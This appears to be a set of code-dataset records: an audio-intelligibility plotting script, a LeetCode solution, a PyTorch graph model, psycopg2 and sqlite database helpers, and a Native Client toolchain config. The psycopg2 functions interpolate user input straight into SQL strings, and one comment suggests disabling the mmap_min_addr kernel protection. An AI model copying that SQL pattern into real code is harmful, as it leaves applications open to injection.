intel_matrix_concatenate[i,1]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_concatenate[i:i+1,:,:],metric='stoi') for i in range(833): print(i) intel_matrix_concatenate[i,2]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_concatenate[i:i+1,:,:],metric='estoi') for i in range(833): print(i) 
intel_matrix_concatenate[i,3]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_concatenate[i:i+1,:,:],metric='si-sdr') #no spikes exp_type='noSpike' size=prediction_noSpike.shape[0] intel_matrix_noSpike=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr prediction_noSpike=np.load(exp_folder+exp_type+'/prediction.npy') intel_matrix_noSpike=np.load(exp_folder+exp_type+'/loss_matrix.npy') for i in range(size): print(i) intel_matrix_noSpike[i,0]=find_intel(clean[i:i+1,:,:],prediction_noSpike[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_noSpike[i,1]=find_intel(clean[i:i+1,:,:],prediction_noSpike[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_noSpike[i,2]=find_intel(clean[i:i+1,:,:],prediction_noSpike[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_noSpike[i,3]=find_intel(clean[i:i+1,:,:],prediction_noSpike[i:i+1,:,:],metric='si-sdr') np.save(exp_folder+exp_type+'loss_matrix',intel_matrix_noSpike) import h5py as hp exp_type='noisy' intel_matrix_noisy=np.zeros(shape=(size,1)) #0:pesq 1:stoi 2:estoi 3:si-sdr file=hp.File(test_path+'/noisy_test.h5','r') snd=file['noisy_test'][:] file.close() snd=snd[:,0:sound_len,:] snd=snd[:,::3,:] size=snd.shape[0] intel_matrix_noisy=np.zeros(shape=(size,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr intel_matrix_noisy=np.load(exp_folder+'loss_matrix_noisy.npy') for i in range(size): print(i) intel_matrix_noisy[i,0]=find_intel(clean[i:i+1,:,:],snd[i:i+1,:,:]) for i in range(size): print(i) intel_matrix_noisy[i,1]=find_intel(clean[i:i+1,:,:],snd[i:i+1,:,:],metric='stoi') for i in range(size): print(i) intel_matrix_noisy[i,2]=find_intel(clean[i:i+1,:,:],snd[i:i+1,:,:],metric='estoi') for i in range(size): print(i) intel_matrix_noisy[i,3]=find_intel(clean[i:i+1,:,:],snd[i:i+1,:,:],metric='si-sdr') np.save(exp_folder+'loss_matrix_noisy',intel_matrix_noisy) exp_folder = '../data' intel_matrix_noisy = np.load(exp_folder + '/loss_matrix_wo_eeg.npy') intel_matrix = np.load(exp_folder + 
'/loss_matrix_with_eeg.npy') fusions = ['film1', 'film2', 'film3', 'film4', 'add', 'concat', 'choice', 'noSp', 'noisy'] metrics = ['pesq', 'stoi', 'estoi', 'si-sdr'] fusions = ['mixture', 'BESD'] metrics = ['PESQ', 'STOI', 'ESTOI', 'SI-SDR'] data = [] z = 2 # data.append(intel_matrix_film1[:,z]) # data.append(intel_matrix_film2[:,z]) # data.append(intel_matrix_film3[:,z]) # data.append(intel_matrix_film4[:,z]) # data.append(intel_matrix_add[:,z]) # data.append(intel_matrix_concatenate[:,z]) # data.append(intel_matrix_choice[:,z]) # data.append(intel_matrix_noSpike[:,z]) data.append(intel_matrix_noisy[:, z]) #data.append(intel_matrix_noSpike[:, z]) data.append(intel_matrix[:, z]) ld = len(metrics) lm = len(fusions) width = 1 / lm - .05 X = np.arange(ld) """ fig = plt.figure() ax = fig.add_axes([0, 0, 1, 1]) for i in range(lm): ax.bar(X + i * width, data[i], width=width) ax.set_ylabel('intelligibility') plt.xticks(X + lm * width / 2, metrics) fusions = [f.replace('_', '') for f in fusions] ax.legend(labels=fusions) #plt.savefig(os.path.join(plot_one_path, 'plot_bars_accs.png'), bbox_inches="tight") """ num_boxes = len(data) pos = np.arange(num_boxes) + 1 medians = np.zeros(shape=len(data)) for i in range(num_boxes): medians[i] = np.median(data[i]) upper_labels = [str(np.round(s, 2)) for s in medians] weights = ['bold', 'semibold'] """ fig1, ax1 = plt.subplots() ax1.boxplot(data, labels=fusions) ax1.set_title(metrics[z]) ax1.yaxis.grid(True, linestyle='-', which='major', color='lightgrey', alpha=0.5) for tick, label in zip(range(num_boxes), ax1.get_xticklabels()): k = tick % 2 ax1.text(pos[tick], .95, upper_labels[tick], transform=ax1.get_xaxis_transform(), horizontalalignment='center', size='x-small', weight=weights[k]) plt.show() """ fig, ax = plt.subplots() violin_handle = ax.violinplot(data, showmeans=False, showmedians=False, showextrema=False, widths=.7) colors = plt.cm.gist_ncar(np.linspace(0.2, .8, len(violin_handle['bodies']))) np.random.seed(0) colors = 
plt.cm.twilight(np.random.rand(len(violin_handle['bodies']))) np.random.shuffle(colors) for pc, c in zip(violin_handle['bodies'], colors): pc.set_facecolor(c) pc.set_edgecolor('black') pc.set_alpha(1.) for tick, label in zip(range(num_boxes), ax.get_xticklabels()): k = tick % 2 ax.text(pos[tick], .95, upper_labels[tick], transform=ax.get_xaxis_transform(), horizontalalignment='center', size='x-small', weight=weights[k]) ax.set_ylabel(metrics[z]) ax.set_ylim(-10, 15) plt.xticks(np.arange(len(fusions)) + 1, fusions) plt.show() fig.savefig('cocktail_sisdr_violins.pdf', bbox_inches='tight')
en
0.399003
# this will load noisy, clean and different predictions # 218880 #load noisy file #test_path= 'C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/data/Cocktail_Party/Normalized/' #test_path='D:/data/EEG processed data/luca way' #exp_folder='C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/experiments/CC/sisdr/with my changes/6/' #exp_folder='C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/experiments/CC/sisdr/with my changes/9-luca data/2020-09-15/' #load clean sound #### do the prediction: #model_weights_WithSpikes_predict.h5' #intel_matrix=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr #load prediction with spikes #0:pesq 1:stoi 2:estoi 3:si-sdr # for i in range(size): # print(i) # c[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='stsa-mse') #load prediction with spikes #0:pesq 1:stoi 2:estoi 3:si-sdr # for i in range(size): # print(i) # c[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='stsa-mse') #load prediction with spikes #0:pesq 1:stoi 2:estoi 3:si-sdr #load prediction with spikes #0:pesq 1:stoi 2:estoi 3:si-sdr #load prediction with spikes #0:pesq 1:stoi 2:estoi 3:si-sdr #load prediction with spikes #0:pesq 1:stoi 2:estoi 3:si-sdr #load prediction with spikes #0:pesq 1:stoi 2:estoi 3:si-sdr #no spikes #0:pesq 1:stoi 2:estoi 3:si-sdr #0:pesq 1:stoi 2:estoi 3:si-sdr #0:pesq 1:stoi 2:estoi 3:si-sdr # data.append(intel_matrix_film1[:,z]) # data.append(intel_matrix_film2[:,z]) # data.append(intel_matrix_film3[:,z]) # data.append(intel_matrix_film4[:,z]) # data.append(intel_matrix_add[:,z]) # data.append(intel_matrix_concatenate[:,z]) # data.append(intel_matrix_choice[:,z]) # data.append(intel_matrix_noSpike[:,z]) #data.append(intel_matrix_noSpike[:, z]) fig = plt.figure() ax = fig.add_axes([0, 0, 1, 1]) for i in range(lm): ax.bar(X + i * width, data[i], width=width) ax.set_ylabel('intelligibility') plt.xticks(X + lm * width / 2, metrics) fusions = [f.replace('_', '') for f in fusions] 
ax.legend(labels=fusions) #plt.savefig(os.path.join(plot_one_path, 'plot_bars_accs.png'), bbox_inches="tight") fig1, ax1 = plt.subplots() ax1.boxplot(data, labels=fusions) ax1.set_title(metrics[z]) ax1.yaxis.grid(True, linestyle='-', which='major', color='lightgrey', alpha=0.5) for tick, label in zip(range(num_boxes), ax1.get_xticklabels()): k = tick % 2 ax1.text(pos[tick], .95, upper_labels[tick], transform=ax1.get_xaxis_transform(), horizontalalignment='center', size='x-small', weight=weights[k]) plt.show()
1.795098
2
codes_/1021_Remove_Outermost_Parentheses.py
SaitoTsutomu/leetcode
0
6623627
# %% [1021. Remove Outermost Parentheses](https://leetcode.com/problems/remove-outermost-parentheses/) # 問題:一番外側の括弧を取り除け class Solution: def removeOuterParentheses(self, S: str) -> str: res, n = "", 0 for s in S: if s == "(": if n: res += "(" n += 1 else: n -= 1 if n: res += ")" return res
# %% [1021. Remove Outermost Parentheses](https://leetcode.com/problems/remove-outermost-parentheses/) # 問題:一番外側の括弧を取り除け class Solution: def removeOuterParentheses(self, S: str) -> str: res, n = "", 0 for s in S: if s == "(": if n: res += "(" n += 1 else: n -= 1 if n: res += ")" return res
en
0.2928
# %% [1021. Remove Outermost Parentheses](https://leetcode.com/problems/remove-outermost-parentheses/) # 問題:一番外側の括弧を取り除け
3.490901
3
model/model.py
codeKgu/BiLevel-Graph-Neural-Network
20
6623628
<reponame>codeKgu/BiLevel-Graph-Neural-Network import torch.nn as nn from config import FLAGS from model.layers_factory import create_layers class Model(nn.Module): def __init__(self, data, config_layer_type='layer'): super(Model, self).__init__() self.train_data = data self.interaction_num_node_feat = data.dataset.interaction_num_node_feat self.num_node_feat = data.num_node_feat self.num_hyper_edge_feat = data.num_hyper_edge_feat self.num_labels = data.dataset.num_labels self.layers = create_layers(self, config_layer_type, vars(FLAGS)["{}_num".format(config_layer_type)]) self.pred_layer = self.layers[-2] # assume pred layer is second to last layer self._use_layers = 'all' if FLAGS.lower_level_layers and FLAGS.higher_level_layers: self._use_layers = 'init_model' self.init_layers = self.layers[:FLAGS.last_lower_lyr_num] self.lower_layers = self.layers[:FLAGS.last_lower_lyr_num + 1] self.higher_level_layers = self.layers[FLAGS.last_lower_lyr_num + 1:] elif FLAGS.lower_level_layers: self.init_layers = self.layers[:-2] self.lower_layers = self.layers[:-2] assert (len(self.layers) > 0) self._print_layers(None, self.layers) self.layer_output = {} self.acts = None def forward(self, batch_data): # Go through each layer except the last one. 
# acts = [self._get_ins(self.layers[0])] md = batch_data.merge_data['merge'] self.acts = [md.x] if FLAGS.lower_level_layers and FLAGS.higher_level_layers: if self._use_layers == 'init_layers': layers = self.init_layers elif self._use_layers == 'lower_layers': layers = self.lower_layers elif self._use_layers == 'higher_layers': layers = self.higher_level_layers elif self._use_layers == 'higher_no_eval_layers': layers = self.layers[FLAGS.last_lower_lyr_num + 1:-2] else: if self._use_layers == "higher_no_eval_layers": layers = self.layers[:-2] elif self._use_layers == 'lower_layers': layers = self.lower_layers elif self._use_layers == 'init_layers': layers = self.init_layers else: layers = self.layers for k, layer in enumerate(layers): ins = self.acts[-1] outs = layer(ins, batch_data, self) self.acts.append(outs) total_loss = self.acts[-1] return total_loss def store_layer_output(self, layer, output): self.layer_output[layer] = output def get_layer_output(self, layer): return self.layer_output[layer] # may get KeyError/ValueError def _print_layers(self, branch_name, layers): print('Created {} layers: {}'.format( len(layers), ', '.join(l.__class__.__name__ for l in layers))) @property def use_layers(self): return self._use_layers @use_layers.setter def use_layers(self, setting): assert setting in ['all', 'init_layers', 'lower_layers', 'higher_layers', 'higher_no_eval_layers'] self._use_layers = setting
import torch.nn as nn from config import FLAGS from model.layers_factory import create_layers class Model(nn.Module): def __init__(self, data, config_layer_type='layer'): super(Model, self).__init__() self.train_data = data self.interaction_num_node_feat = data.dataset.interaction_num_node_feat self.num_node_feat = data.num_node_feat self.num_hyper_edge_feat = data.num_hyper_edge_feat self.num_labels = data.dataset.num_labels self.layers = create_layers(self, config_layer_type, vars(FLAGS)["{}_num".format(config_layer_type)]) self.pred_layer = self.layers[-2] # assume pred layer is second to last layer self._use_layers = 'all' if FLAGS.lower_level_layers and FLAGS.higher_level_layers: self._use_layers = 'init_model' self.init_layers = self.layers[:FLAGS.last_lower_lyr_num] self.lower_layers = self.layers[:FLAGS.last_lower_lyr_num + 1] self.higher_level_layers = self.layers[FLAGS.last_lower_lyr_num + 1:] elif FLAGS.lower_level_layers: self.init_layers = self.layers[:-2] self.lower_layers = self.layers[:-2] assert (len(self.layers) > 0) self._print_layers(None, self.layers) self.layer_output = {} self.acts = None def forward(self, batch_data): # Go through each layer except the last one. 
# acts = [self._get_ins(self.layers[0])] md = batch_data.merge_data['merge'] self.acts = [md.x] if FLAGS.lower_level_layers and FLAGS.higher_level_layers: if self._use_layers == 'init_layers': layers = self.init_layers elif self._use_layers == 'lower_layers': layers = self.lower_layers elif self._use_layers == 'higher_layers': layers = self.higher_level_layers elif self._use_layers == 'higher_no_eval_layers': layers = self.layers[FLAGS.last_lower_lyr_num + 1:-2] else: if self._use_layers == "higher_no_eval_layers": layers = self.layers[:-2] elif self._use_layers == 'lower_layers': layers = self.lower_layers elif self._use_layers == 'init_layers': layers = self.init_layers else: layers = self.layers for k, layer in enumerate(layers): ins = self.acts[-1] outs = layer(ins, batch_data, self) self.acts.append(outs) total_loss = self.acts[-1] return total_loss def store_layer_output(self, layer, output): self.layer_output[layer] = output def get_layer_output(self, layer): return self.layer_output[layer] # may get KeyError/ValueError def _print_layers(self, branch_name, layers): print('Created {} layers: {}'.format( len(layers), ', '.join(l.__class__.__name__ for l in layers))) @property def use_layers(self): return self._use_layers @use_layers.setter def use_layers(self, setting): assert setting in ['all', 'init_layers', 'lower_layers', 'higher_layers', 'higher_no_eval_layers'] self._use_layers = setting
en
0.720737
# assume pred layer is second to last layer # Go through each layer except the last one. # acts = [self._get_ins(self.layers[0])] # may get KeyError/ValueError
2.36872
2
miniFBFlask/queries.py
timruet/DBS_Project
0
6623629
<reponame>timruet/DBS_Project import psycopg2 DATABASE = "postgres" USER = "postgres" PASSWORD = "<PASSWORD>" def get_user_data_based_on_user_id(user_id): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT id, screenname, name, age, income " f"FROM facebook_user " f"where id = {user_id}") result = cur.fetchone() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_user_data_based_on_user_name(user_name): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT id, screenname, name, age, income " f"FROM facebook_user " f"WHERE facebook_user.screenname = \'{user_name}\' ") result = cur.fetchone() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_number_of_records(): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT COUNT(id) FROM facebook_user") result = cur.fetchone() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_user_fans_by_user_id(user_id): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT DISTINCT facebook_user.screenname " f"FROM facebook_user " f"INNER JOIN is_fan_of " f"ON facebook_user.id = is_fan_of.fanid " f"WHERE is_fan_of.idolid = {user_id}") result = cur.fetchall() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_who_user_dates_by_user_id(user_id): 
conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT DISTINCT facebook_user.screenname " f"FROM facebook_user " f"INNER JOIN dates ON facebook_user.id = dates.userid_2 " f"WHERE dates.userid_1 = {user_id}") result = cur.fetchall() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_who_user_marries_by_user_id(user_id): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT DISTINCT facebook_user.screenname " f"FROM facebook_user " f"INNER JOIN is_married_to imt on facebook_user.id = imt.userid_2 " f"WHERE imt.userid_1 = {user_id}") result = cur.fetchall() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result if __name__ == "__main__": print(get_user_data_based_on_user_name("easySmuu"))
import psycopg2 DATABASE = "postgres" USER = "postgres" PASSWORD = "<PASSWORD>" def get_user_data_based_on_user_id(user_id): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT id, screenname, name, age, income " f"FROM facebook_user " f"where id = {user_id}") result = cur.fetchone() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_user_data_based_on_user_name(user_name): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT id, screenname, name, age, income " f"FROM facebook_user " f"WHERE facebook_user.screenname = \'{user_name}\' ") result = cur.fetchone() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_number_of_records(): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT COUNT(id) FROM facebook_user") result = cur.fetchone() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_user_fans_by_user_id(user_id): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT DISTINCT facebook_user.screenname " f"FROM facebook_user " f"INNER JOIN is_fan_of " f"ON facebook_user.id = is_fan_of.fanid " f"WHERE is_fan_of.idolid = {user_id}") result = cur.fetchall() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_who_user_dates_by_user_id(user_id): conn = None result = None try: 
conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT DISTINCT facebook_user.screenname " f"FROM facebook_user " f"INNER JOIN dates ON facebook_user.id = dates.userid_2 " f"WHERE dates.userid_1 = {user_id}") result = cur.fetchall() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_who_user_marries_by_user_id(user_id): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT DISTINCT facebook_user.screenname " f"FROM facebook_user " f"INNER JOIN is_married_to imt on facebook_user.id = imt.userid_2 " f"WHERE imt.userid_1 = {user_id}") result = cur.fetchall() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result if __name__ == "__main__": print(get_user_data_based_on_user_name("easySmuu"))
none
1
3.278111
3
database/database.py
AivGitHub/clutcher
0
6623630
import sqlite3 import pathlib from clutcher import settings from database import exception class Row(sqlite3.Row): def __init__(self, *args, **kwargs): super(Row, self).__init__() def get(self, attr, default_value: str = None) -> str: try: return self[attr] except IndexError: return default_value class Database: FETCH_MANY_AMOUNT = 100 DEFAULT_ROW_FACTORY = 'Row' _SQL_TORRENT_TABLE = """CREATE TABLE %s torrent ( id integer PRIMARY KEY, name text NOT NULL, torrent_path text, path_to_save text, created_by text, comment text, creation_date text )""" def __init__(self, db_name: str = settings.NAME) -> None: _cwd = pathlib.Path.cwd() self.database_path = (_cwd / 'database/data' / f'{db_name}.db').resolve() self.connection = self.database_path self.cursor = self.connection.cursor() @property def connection(self) -> sqlite3.Connection: return self.__connection @connection.setter def connection(self, db_path: str, row_factory: str = DEFAULT_ROW_FACTORY) -> None: _connection = sqlite3.connect(db_path) if row_factory == self.DEFAULT_ROW_FACTORY: _connection.row_factory = Row else: raise exception.WrongRowFactoryException(f'Wrong row factory: {row_factory}') self.__connection = _connection def execute(self, query: str, values: tuple = ()) -> None: if values: self.cursor.execute(query, values) else: self.cursor.execute(query) self.connection.commit() def create_table(self, query: str = _SQL_TORRENT_TABLE, ignore_existence: bool = True) -> None: """ :param query: Creation query. 
See _SQL_TORRENT_TABLE example :param ignore_existence: if False, then sqlite3.OperationalError: table torrent already exists is raised :raise: database.exception.WrongQueryException if query does not contain %s for "IF NOT EXISTS" block :raise: sqlite3.OperationalError if ignore_existence = False :return: None TODO: Change to universal way """ _if_not_exists = '' if query and '%s' not in query: raise exception.WrongQueryException('Query must contain \'%s\'') if ignore_existence: _if_not_exists = 'IF NOT EXISTS' self.execute(query % _if_not_exists) def secure_fetchall(self, query: str) -> list: _executed = self.cursor.execute(query) _next = _executed.fetchmany(self.FETCH_MANY_AMOUNT) while _next: mapped_rows = self.rows_mapper(_next) _next = _executed.fetchmany(self.FETCH_MANY_AMOUNT) yield mapped_rows def delete_all_data(self): self.execute('DELETE FROM torrent') @classmethod def rows_mapper(cls, rows: list) -> list: mapped_rows = [] for row in rows: _keys = row.keys() _values = [row.get(key) for key in _keys] _zipped = zip(_keys, _values) mapped_rows.append(dict(_zipped)) return mapped_rows def close(self) -> None: self.connection.close()
import sqlite3 import pathlib from clutcher import settings from database import exception class Row(sqlite3.Row): def __init__(self, *args, **kwargs): super(Row, self).__init__() def get(self, attr, default_value: str = None) -> str: try: return self[attr] except IndexError: return default_value class Database: FETCH_MANY_AMOUNT = 100 DEFAULT_ROW_FACTORY = 'Row' _SQL_TORRENT_TABLE = """CREATE TABLE %s torrent ( id integer PRIMARY KEY, name text NOT NULL, torrent_path text, path_to_save text, created_by text, comment text, creation_date text )""" def __init__(self, db_name: str = settings.NAME) -> None: _cwd = pathlib.Path.cwd() self.database_path = (_cwd / 'database/data' / f'{db_name}.db').resolve() self.connection = self.database_path self.cursor = self.connection.cursor() @property def connection(self) -> sqlite3.Connection: return self.__connection @connection.setter def connection(self, db_path: str, row_factory: str = DEFAULT_ROW_FACTORY) -> None: _connection = sqlite3.connect(db_path) if row_factory == self.DEFAULT_ROW_FACTORY: _connection.row_factory = Row else: raise exception.WrongRowFactoryException(f'Wrong row factory: {row_factory}') self.__connection = _connection def execute(self, query: str, values: tuple = ()) -> None: if values: self.cursor.execute(query, values) else: self.cursor.execute(query) self.connection.commit() def create_table(self, query: str = _SQL_TORRENT_TABLE, ignore_existence: bool = True) -> None: """ :param query: Creation query. 
See _SQL_TORRENT_TABLE example :param ignore_existence: if False, then sqlite3.OperationalError: table torrent already exists is raised :raise: database.exception.WrongQueryException if query does not contain %s for "IF NOT EXISTS" block :raise: sqlite3.OperationalError if ignore_existence = False :return: None TODO: Change to universal way """ _if_not_exists = '' if query and '%s' not in query: raise exception.WrongQueryException('Query must contain \'%s\'') if ignore_existence: _if_not_exists = 'IF NOT EXISTS' self.execute(query % _if_not_exists) def secure_fetchall(self, query: str) -> list: _executed = self.cursor.execute(query) _next = _executed.fetchmany(self.FETCH_MANY_AMOUNT) while _next: mapped_rows = self.rows_mapper(_next) _next = _executed.fetchmany(self.FETCH_MANY_AMOUNT) yield mapped_rows def delete_all_data(self): self.execute('DELETE FROM torrent') @classmethod def rows_mapper(cls, rows: list) -> list: mapped_rows = [] for row in rows: _keys = row.keys() _values = [row.get(key) for key in _keys] _zipped = zip(_keys, _values) mapped_rows.append(dict(_zipped)) return mapped_rows def close(self) -> None: self.connection.close()
en
0.368847
CREATE TABLE %s torrent ( id integer PRIMARY KEY, name text NOT NULL, torrent_path text, path_to_save text, created_by text, comment text, creation_date text ) :param query: Creation query. See _SQL_TORRENT_TABLE example :param ignore_existence: if False, then sqlite3.OperationalError: table torrent already exists is raised :raise: database.exception.WrongQueryException if query does not contain %s for "IF NOT EXISTS" block :raise: sqlite3.OperationalError if ignore_existence = False :return: None TODO: Change to universal way
2.743338
3
tools/toolchain_tester/toolchain_config.py
eseidel/native_client_patches
4
6623631
<reponame>eseidel/native_client_patches # Copyright 2008 The Native Client Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can # be found in the LICENSE file. # # Config file for various nacl compilation scenarios # import os import sys TOOLCHAIN_CONFIGS = {} class ToolchainConfig(object): def __init__(self, desc, commands, tools_needed, **extra): self._desc = desc, self._commands = commands self._tools_needed = tools_needed self._extra = extra def Append(self, tag, value): assert tag in self._extra self._extra[tag] = self._extra[tag] + ' ' + value + ' ' def SanityCheck(self): for t in self._tools_needed: if not os.access(t, os.R_OK | os.X_OK): print "ERROR: missing tool ", t sys.exit(-1) def GetDescription(self): return self._desc def GetCommands(self, extra): for tag, val in self._commands: d = {} d.update(self._extra) d.update(extra) yield tag, val % d def GetPhases(self): return [a for (a, _) in self._commands] ###################################################################### # ###################################################################### LOCAL_GCC = '/usr/bin/gcc' EMU_SCRIPT = 'toolchain/linux_arm-trusted/qemu_tool.sh' SEL_LDR_ARM = 'scons-out/opt-linux-arm/staging/sel_ldr' SEL_LDR_X32 = 'scons-out/opt-linux-x86-32/staging/sel_ldr' SEL_LDR_X64 = 'scons-out/opt-linux-x86-64/staging/sel_ldr' NACL_GCC_X32 = 'toolchain/linux_x86/bin/nacl-gcc' NACL_GCC_X64 = 'toolchain/linux_x86/bin/nacl64-gcc' GLOBAL_CFLAGS = '-DSTACK_SIZE=0x40000 -DNO_TRAMPOLINES -DNO_LABEL_VALUES' ###################################################################### # LOCAL GCC ###################################################################### COMMANDS_local_gcc = [ ('compile', '%(CC)s %(src)s %(CFLAGS)s -o %(tmp)s.exe', ), ] TOOLCHAIN_CONFIGS['local_gcc_x8632_O0'] = ToolchainConfig( desc='local gcc [x86-32]', commands=COMMANDS_local_gcc, tools_needed=[LOCAL_GCC], CC = LOCAL_GCC, CFLAGS = '-O0 -m32 -static ' + GLOBAL_CFLAGS) 
TOOLCHAIN_CONFIGS['local_gcc_x8664_O0'] = ToolchainConfig( desc='local gcc [x86-64]', commands=COMMANDS_local_gcc, tools_needed=[LOCAL_GCC], CC = LOCAL_GCC, CFLAGS = '-O0 -m64 -static ' + GLOBAL_CFLAGS) ###################################################################### # CS ARM ###################################################################### # NOTE: you may need this if you see mmap: Permission denied # "echo 0 > /proc/sys/vm/mmap_min_addr" GCC_CS_ARM = ('toolchain/linux_arm-trusted/arm-2009q3/' + 'bin/arm-none-linux-gnueabi-gcc') COMMANDS_gcc_cs_arm = [ ('compile', '%(CC)s %(src)s %(CFLAGS)s -o %(tmp)s.exe', ), ('emu', '%(EMU_SCRIPT)s run %(tmp)s.exe', ) ] TOOLCHAIN_CONFIGS['gcc_cs_arm_O0'] = ToolchainConfig( desc='codesourcery cross gcc [arm]', commands=COMMANDS_gcc_cs_arm, tools_needed=[GCC_CS_ARM, EMU_SCRIPT ], CC = GCC_CS_ARM, EMU_SCRIPT = EMU_SCRIPT, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['gcc_cs_arm_O9'] = ToolchainConfig( desc='codesourcery cross gcc [arm]', commands=COMMANDS_gcc_cs_arm, tools_needed=[GCC_CS_ARM, EMU_SCRIPT ], CC = GCC_CS_ARM, EMU_SCRIPT = EMU_SCRIPT, CFLAGS = '-O9 -static ' + GLOBAL_CFLAGS) ###################################################################### # # NACL + SEL_LDR [X86] ###################################################################### COMMANDS_nacl_gcc = [ ('compile', '%(CC)s %(src)s %(CFLAGS)s -o %(tmp)s.exe', ), ('sel_ldr', '%(SEL_LDR)s -f %(tmp)s.exe', ) ] TOOLCHAIN_CONFIGS['nacl_gcc_x8632_O0'] = ToolchainConfig( desc='nacl gcc [x86-32]', commands=COMMANDS_nacl_gcc, tools_needed=[NACL_GCC_X32, SEL_LDR_X32], CC = NACL_GCC_X32, SEL_LDR = SEL_LDR_X32, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['nacl_gcc_x8632_O9'] = ToolchainConfig( desc='nacl gcc with optimizations [x86-32]', commands=COMMANDS_nacl_gcc, tools_needed=[NACL_GCC_X32, SEL_LDR_X32], CC = NACL_GCC_X32, SEL_LDR = SEL_LDR_X32, CFLAGS = '-O9 -static') TOOLCHAIN_CONFIGS['nacl_gcc_x8664_O0'] = ToolchainConfig( 
desc='nacl gcc [x86-64]', commands=COMMANDS_nacl_gcc, tools_needed=[NACL_GCC_X64, SEL_LDR_X64], CC = NACL_GCC_X64, SEL_LDR = SEL_LDR_X64, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['nacl_gcc_x8664_O9'] = ToolchainConfig( desc='nacl gcc with optimizations [x86-64]', commands=COMMANDS_nacl_gcc, tools_needed=[NACL_GCC_X64, SEL_LDR_X64], CC = NACL_GCC_X64, SEL_LDR = SEL_LDR_X64, CFLAGS = '-O9 -static ' + GLOBAL_CFLAGS) ###################################################################### # PNACL + SEL_LDR [ARM] ###################################################################### DRIVER_PATH = 'toolchain/linux_arm-untrusted/bin' PNACL_LLVM_GCC = DRIVER_PATH + '/pnacl-gcc' PNACL_BCLD = DRIVER_PATH + '/pnacl-bcld' PNACL_LIB_DIR = 'toolchain/linux_arm-untrusted/libs-bitcode/' COMMANDS_llvm_pnacl_arm = [ ('compile-bc', '%(CC)s %(src)s %(CFLAGS)s -c -o %(tmp)s.bc', ), ('translate-arm', '%(LD)s %(tmp)s.bc -o %(tmp)s.nexe -L%(LIB_DIR)s -lc -lnacl -lnosys', ), ('qemu-sel_ldr', '%(EMU)s run %(SEL_LDR)s -Q -d %(tmp)s.nexe', ) ] TOOLCHAIN_CONFIGS['llvm_pnacl_arm_O0'] = ToolchainConfig( desc='pnacl llvm [arm]', commands=COMMANDS_llvm_pnacl_arm, tools_needed=[PNACL_LLVM_GCC, PNACL_BCLD, EMU_SCRIPT, SEL_LDR_ARM], CC = PNACL_LLVM_GCC + ' -emit-llvm', LD = PNACL_BCLD + ' -arch arm', EMU = EMU_SCRIPT, SEL_LDR = SEL_LDR_ARM, LIB_DIR = PNACL_LIB_DIR, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) 